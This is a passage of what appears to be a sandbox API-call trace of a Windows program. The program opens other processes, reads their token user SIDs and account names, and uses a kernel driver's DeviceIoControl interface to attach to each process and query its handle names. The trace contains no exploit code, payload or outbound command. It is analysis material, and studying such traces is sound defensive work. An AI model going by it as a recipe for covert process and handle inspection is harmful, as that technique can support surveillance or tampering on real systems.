ApcState=0xfffff880052b35d0) [0226.408] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.408] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.408] PsReleaseProcessExitSynchronization () returned 0x2 [0226.408] ObfDereferenceObject (Object=0xfffffa800208e620) returned 0x12 [0226.408] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.408] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.408] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.408] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x348) returned 0xc8 [0226.408] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.408] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa800209d060, HandleInformation=0x0) returned 0x0 [0226.408] ObOpenObjectByPointer (in: Object=0xfffffa800209d060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000838) returned 0x0 [0226.408] ObfDereferenceObject (Object=0xfffffa800209d060) returned 0x14 [0226.408] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000838, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.408] ZwClose (Handle=0xffffffff80000838) returned 0x0 [0226.408] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.409] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.409] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.411] CloseHandle (hObject=0xc4) returned 1 [0226.411] CloseHandle (hObject=0xc8) returned 1 [0226.411] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.411] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.411] PsLookupProcessByProcessId (in: ProcessId=0x348, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.411] PsAcquireProcessExitSynchronization () returned 0x0 [0226.411] KeStackAttachProcess (in: PROCESS=0xfffffa800209d060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800209d060, ApcState=0xfffff880052b35d0) [0226.412] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800209fa20, HandleInformation=0x0) returned 0x0 [0226.412] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.412] PsReleaseProcessExitSynchronization () returned 0x2 [0226.412] ObfDereferenceObject (Object=0xfffffa800209d060) returned 0x12 [0226.412] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.412] ObfDereferenceObject (Object=0xfffffa800209fa20) returned 0x1 [0226.412] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.412] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.412] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.412] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0226.412] PsLookupProcessByProcessId (in: ProcessId=0x348, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.412] PsAcquireProcessExitSynchronization () returned 0x0 [0226.412] KeStackAttachProcess (in: PROCESS=0xfffffa800209d060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800209d060, ApcState=0xfffff880052b35d0) [0226.412] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020a1e90, HandleInformation=0x0) returned 0x0 [0226.412] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.412] PsReleaseProcessExitSynchronization () returned 0x2 [0226.412] ObfDereferenceObject (Object=0xfffffa800209d060) returned 0x12 [0226.412] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307e044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307e044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.413] ObfDereferenceObject (Object=0xfffffa80020a1e90) returned 0x1 [0226.413] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.413] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.413] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.413] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.413] PsLookupProcessByProcessId (in: ProcessId=0x348, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.413] PsAcquireProcessExitSynchronization () returned 0x0 [0226.413] KeStackAttachProcess (in: PROCESS=0xfffffa800209d060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800209d060, ApcState=0xfffff880052b35d0) [0226.413] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.413] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.413] PsReleaseProcessExitSynchronization () returned 0x2 [0226.413] ObfDereferenceObject (Object=0xfffffa800209d060) returned 0x12 [0226.413] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800307f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.413] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.413] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.413] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xc8 [0226.413] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.413] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8003910240, HandleInformation=0x0) returned 0x0 [0226.413] ObOpenObjectByPointer (in: Object=0xfffffa8003910240, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000838) returned 0x0 [0226.414] ObfDereferenceObject (Object=0xfffffa8003910240) returned 0x14 [0226.414] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000838, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.414] ZwClose (Handle=0xffffffff80000838) returned 0x0 [0226.414] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.414] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.414] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.490] CloseHandle (hObject=0xc4) returned 1 [0226.490] CloseHandle (hObject=0xc8) returned 1 [0226.490] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.491] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.491] PsLookupProcessByProcessId (in: ProcessId=0x310, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.491] PsAcquireProcessExitSynchronization () returned 0x0 [0226.491] KeStackAttachProcess (in: PROCESS=0xfffffa8003910240, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003910240, ApcState=0xfffff880052b35d0) [0226.491] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020a1070, HandleInformation=0x0) returned 0x0 [0226.491] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.491] PsReleaseProcessExitSynchronization () returned 0x2 [0226.491] ObfDereferenceObject (Object=0xfffffa8003910240) returned 0x12 [0226.491] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.491] ObfDereferenceObject (Object=0xfffffa80020a1070) returned 0x1 [0226.491] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.491] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.491] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.491] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x80, lpOverlapped=0x0) returned 1 [0226.491] PsLookupProcessByProcessId (in: ProcessId=0x310, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.492] PsAcquireProcessExitSynchronization () returned 0x0 [0226.492] KeStackAttachProcess (in: PROCESS=0xfffffa8003910240, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003910240, ApcState=0xfffff880052b35d0) [0226.492] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002033ba0, HandleInformation=0x0) returned 0x0 [0226.492] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.492] PsReleaseProcessExitSynchronization () returned 0x2 [0226.492] ObfDereferenceObject (Object=0xfffffa8003910240) returned 0x12 [0226.492] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.492] ObfDereferenceObject (Object=0xfffffa8002033ba0) returned 0x1 [0226.492] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.492] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.492] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.492] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.492] PsLookupProcessByProcessId (in: ProcessId=0x310, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.492] PsAcquireProcessExitSynchronization () returned 0x0 [0226.492] KeStackAttachProcess (in: PROCESS=0xfffffa8003910240, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003910240, ApcState=0xfffff880052b35d0) [0226.492] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.492] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.492] PsReleaseProcessExitSynchronization () returned 0x2 [0226.492] ObfDereferenceObject (Object=0xfffffa8003910240) returned 0x12 [0226.492] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.492] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.492] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.492] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x54c) returned 0xc8 [0226.492] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.492] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8001f49b30, HandleInformation=0x0) returned 0x0 [0226.492] ObOpenObjectByPointer (in: Object=0xfffffa8001f49b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000838) returned 0x0 [0226.493] ObfDereferenceObject (Object=0xfffffa8001f49b30) returned 0x14 [0226.493] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000838, DesiredAccess=0x8, TokenHandle=0xfffffa8002fc1f40 | out: TokenHandle=0xfffffa8002fc1f40*=0xc4) returned 0x0 [0226.493] ZwClose (Handle=0xffffffff80000838) returned 0x0 [0226.493] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.493] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.493] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.495] CloseHandle (hObject=0xc4) returned 1 [0226.495] CloseHandle (hObject=0xc8) returned 1 [0226.495] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.495] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.495] PsLookupProcessByProcessId (in: ProcessId=0x54c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.495] PsAcquireProcessExitSynchronization () returned 0x0 [0226.495] KeStackAttachProcess (in: PROCESS=0xfffffa8001f49b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f49b30, ApcState=0xfffff880052b35d0) [0226.495] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020a9f20, HandleInformation=0x0) returned 0x0 [0226.495] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.495] PsReleaseProcessExitSynchronization () returned 0x2 [0226.495] ObfDereferenceObject (Object=0xfffffa8001f49b30) returned 0x12 [0226.495] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.495] ObfDereferenceObject (Object=0xfffffa80020a9f20) returned 0x1 [0226.495] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.495] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.495] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.496] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0226.496] PsLookupProcessByProcessId (in: ProcessId=0x54c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.496] PsAcquireProcessExitSynchronization () returned 0x0 [0226.496] KeStackAttachProcess (in: PROCESS=0xfffffa8001f49b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f49b30, ApcState=0xfffff880052b35d0) [0226.496] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020a8070, HandleInformation=0x0) returned 0x0 [0226.496] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.496] PsReleaseProcessExitSynchronization () returned 0x2 [0226.496] ObfDereferenceObject (Object=0xfffffa8001f49b30) returned 0x12 [0226.496] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.496] ObfDereferenceObject (Object=0xfffffa80020a8070) returned 0x1 [0226.496] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.496] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.496] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.496] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.496] PsLookupProcessByProcessId (in: ProcessId=0x54c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.496] PsAcquireProcessExitSynchronization () returned 0x0 [0226.496] KeStackAttachProcess (in: PROCESS=0xfffffa8001f49b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f49b30, ApcState=0xfffff880052b35d0) [0226.496] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.496] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.496] PsReleaseProcessExitSynchronization () returned 0x2 [0226.496] ObfDereferenceObject (Object=0xfffffa8001f49b30) returned 0x12 [0226.496] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.496] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.496] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.496] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xc8 [0226.496] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.496] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8001fc5b30, HandleInformation=0x0) returned 0x0 [0226.497] ObOpenObjectByPointer (in: Object=0xfffffa8001fc5b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000838) returned 0x0 [0226.497] ObfDereferenceObject (Object=0xfffffa8001fc5b30) returned 0x14 [0226.497] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000838, DesiredAccess=0x8, TokenHandle=0xfffffa8002fc1f40 | out: TokenHandle=0xfffffa8002fc1f40*=0xc4) returned 0x0 [0226.497] ZwClose (Handle=0xffffffff80000838) returned 0x0 [0226.497] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.497] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.497] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.498] CloseHandle (hObject=0xc4) returned 1 [0226.498] CloseHandle (hObject=0xc8) returned 1 [0226.499] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.499] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.499] PsLookupProcessByProcessId (in: ProcessId=0x7a4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.499] PsAcquireProcessExitSynchronization () returned 0x0 [0226.499] KeStackAttachProcess (in: PROCESS=0xfffffa8001fc5b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001fc5b30, ApcState=0xfffff880052b35d0) [0226.499] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f9fdd0, HandleInformation=0x0) returned 0x0 [0226.499] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.499] PsReleaseProcessExitSynchronization () returned 0x2 